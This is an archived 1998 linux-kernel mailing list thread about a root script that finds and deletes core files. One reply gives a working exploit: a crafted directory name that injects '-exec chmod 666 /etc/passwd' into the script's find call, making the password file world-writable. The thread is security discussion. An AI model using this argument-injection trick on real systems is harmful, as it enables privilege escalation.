>> In <199810260025.TAA13771@alcove.wittsend.com> Michael H. Warfield (mhw@wittsend.com) wrote:
>> MW> Khimenko Victor enscribed thusly:
>> >> 25-Oct-98 20:01 you wrote:
>> >> > Hi Michael.
>>
>> >> >>> % Already tried, and he's not interested, but I did find out what script
>> >> >>> % he's using...
>> >> >>> %
>> >> >>> % Q> #!/bin/sh
>> >> >>> % Q> XYZZY="`find / -name core`"
>> >> >>> % Q> for LOOP in `find $XYZZY | sort -ru` ; do
>> >> >>> % Q> rm -fr $LOOP
>> >> >>> % Q> done
>>
HO> <Lots snipped>
>> Uh, oh, ah. If you THAT serius then send me (privately if you do not want to
>> create troubles from publishing such exploit -- I'll not distribute it)
>> exploit of THIS SCRIPT (not my bash, my glibc or my perl but exploit of THIS
>> SCRIPT; that is exploit which is not possible without executing of this script
>> every hour -- something like mkdir -p "/tmp /dev /core") which will make my
>> /etc/passwd word-writable.
HO> You asked for an exploit of that exact script, here's one that works
HO> mkdir -p ' -exec chmod 666 /etc/passwd ; -o -name /core'
HO> You don't need any shell metachars to make it execute any command you
HO> want.
Oops. I'm forgot about problem with second find parameters :-(( Shit. Yes.
Even if script is really immune to metacharacters (and here I am right after
all :-) it's still vulnerable via good old trick with parameters (this trick
was used in so many places so many times in different wariations and still
sometimes it's hard to remember it - shame on me). Good work.
P.S. But I'm still not sure if it was wise idea to publish this in list :-((
-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.rutgers.edu
Please read the FAQ at http://www.tux.org/lkml/